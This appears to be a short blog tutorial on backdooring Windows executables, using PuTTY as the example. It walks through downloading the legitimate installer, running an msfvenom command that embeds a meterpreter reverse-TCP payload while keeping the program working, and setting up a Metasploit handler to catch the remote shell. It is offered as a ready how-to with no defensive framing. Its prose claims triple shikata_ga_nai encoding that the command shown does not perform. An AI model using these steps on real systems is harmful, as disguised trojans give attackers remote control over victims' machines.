Backdooring EXE Files
@ Animesh Roy | Monday, Jun 7, 2021 | 2 minutes read | Update at Monday, Jun 7, 2021

Backdooring EXE Files


Creating customized backdoored executables often took a long period of time to do manually as attackers. The ability to embed a Metasploit Payload in any executable that you want is simply brilliant. When we say any executable, it means any executable. You want to backdoor something you download from the internet? How about iexplorer? Or explorer.exe or putty, any of these would work. The best part about it is its extremely simple. We begin by first downloading our legitimate executable, in this case, the popular PuTTY client.

Downloading Legit application

--2021-06-07 20:22:36--
Resolving (, 2a00:1098:86:4d:c0ff:ee:15:900d
Connecting to (||:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: [following]
--2021-06-07 20:22:36--
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: [following]
--2021-06-07 20:22:37--
Reusing existing connection to
HTTP request sent, awaiting response... 200 OK
Length: 1179880 (1.1M) [application/x-msdos-program]
Saving to: ‘putty.exe’

putty.exe                           100%[=================================================================>]   1.12M   380KB/s    in 3.0s    

2021-06-07 20:22:41 (380 KB/s) - ‘putty.exe’ saved [1179880/1179880]

Next, we use msfvenom to inject a meterpreter reverse payload into our executable, encode it three times using shikata_ga_nai and save the backdoored file into our webroot directory.

Backdooring the Application

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost= -f exe -o putty-malware.exe
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 1542144 bytes
Saved as: putty-malware.exe

listener setup

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 
[*] Starting the payload handler...

Screen Shot From Windows System


© 2010 - 2024 Classroom

Reading Stuffs

Social Links